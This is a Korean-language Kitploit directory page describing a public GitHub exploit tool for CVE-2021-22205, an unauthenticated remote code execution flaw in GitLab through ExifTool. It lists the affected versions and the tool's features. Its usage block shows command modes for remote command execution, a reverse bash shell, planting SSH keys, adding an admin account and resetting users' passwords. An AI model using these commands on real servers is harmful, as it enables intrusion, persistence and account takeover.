Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-22205 — ExifTool을 사용한 GitLab CE/EE 사전 인증 RCE | Kitploit
도구/GitHubGitHub/inspiringz/cve-2021-22205
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access ToolArchived
GitHubinspiringz/cve-2021-22205

CVE-2021-22205

ExifTool을 사용한 GitLab CE/EE 사전 인증 RCE

저장소 보기
237414년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-22205

ExifTool을 사용한 GitLab CE/EE 사전 인증 RCE

이 프로젝트는 학습 목적으로만 제공됩니다. 만약 누군가의 권리가 침해되었다면, 프로젝트를 삭제할 수 있도록 연락해 주십시오. 마지막으로 불법으로 사용하지 마십시오. 이 도구를 사용하는 과정에서 불법 행위를 저지르면 모든 책임은 본인에게 있습니다. 이 도구의 모든 개발자와 기여자는 어떠한 법적 및 공동 책임도 지지 않습니다.

설명

GitLab CE/EE 11.9부터 모든 버전에 영향을 주는 문제가 발견되었습니다. GitLab은 파일 파서에 전달된 이미지 파일을 제대로 검증하지 않아 원격 명령 실행이 발생했습니다.

영향 받는 버전:

  • >=11.9, <13.8.8
  • >=13.9, <13.9.6
  • >=13.10, <13.10.3

기능

  • Webpack manifest.json의 해시를 통한 GitLab 버전 탐지
  • DNSLog 및 PostBin RequestBin을 사용한 자동 대역 외 상호작용
  • 리버스 배쉬 셸 지원 / SSH 키를 authorized_keys에 추가
  • ENTER 키를 눌러 GitLab 사용자 비밀번호 수정 및 복원 지원

사용법

root@kitploit:~
🐚 ››› python CVE-2021-22205.py

      ░░░░▐▐░░░  CVE-2021-22205
 ▐  ░░░░░▄██▄▄  GitLab CE/EE Unauthenticated RCE using ExifTool
  ▀▀██████▀░░  Affecting all versions starting from 11.9
  ░░▐▐░░▐▐░░  security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild
 ▒▒▒▐▐▒▒▐▐▒  github.com/inspiringz/CVE-2021-22205

Usage:
    python3 CVE-2021-22205.py -u site_url -m detect        # gitlab version & vuln detect
    python3 CVE-2021-22205.py -u site_url -m rce1 'id'     # rce (echo via requestbin oob) 
    python3 CVE-2021-22205.py -u site_url -m rce2 'id'     # rce (echo via write file) *
    python3 CVE-2021-22205.py -u site_url -m rev ip port   # reverse bash shell
    python3 CVE-2021-22205.py -u site_url -m ssh git/root  # append ssh authorized_keys
    python3 CVE-2021-22205.py -u site_url -m add user pass # add manager account *
    python3 CVE-2021-22205.py -u site_url -m mod user      # modify specified user's password => P4ss@GitLab
    python3 CVE-2021-22205.py -u site_url -m rec user      # restore specified user's original password
  • site_url 매개변수 형식: http[s]://<domain|ip>[:port]/, 예: https://example.com:9000/
  • *로 표시된 메서드(rce2, add)는 불안정하여 작동하지 않을 수 있습니다 :(
  • 실제 환경에 따라 스크립트 내용을 수정할 수 있습니다.

스크린샷

탐지:

image-20220116233646585

RCE(RequestBin OOB를 통한 에코):

image-20220116234003576

리버스 배쉬 셸:

image-20211111131442470

SSH 키를 authorized_keys에 추가:

image-20211111133555010

GitLab 사용자 비밀번호 수정 및 복원:

image-20211111132115090

참고

  • https://github.com/projectdiscovery/nuclei-templates/blob/637eec3efac6eb384742c7aaa4e7d14f3392ede9/cves/2021/CVE-2021-22205.yaml
  • https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
  • https://github.com/righel/gitlab-version-nse
도구 다운로드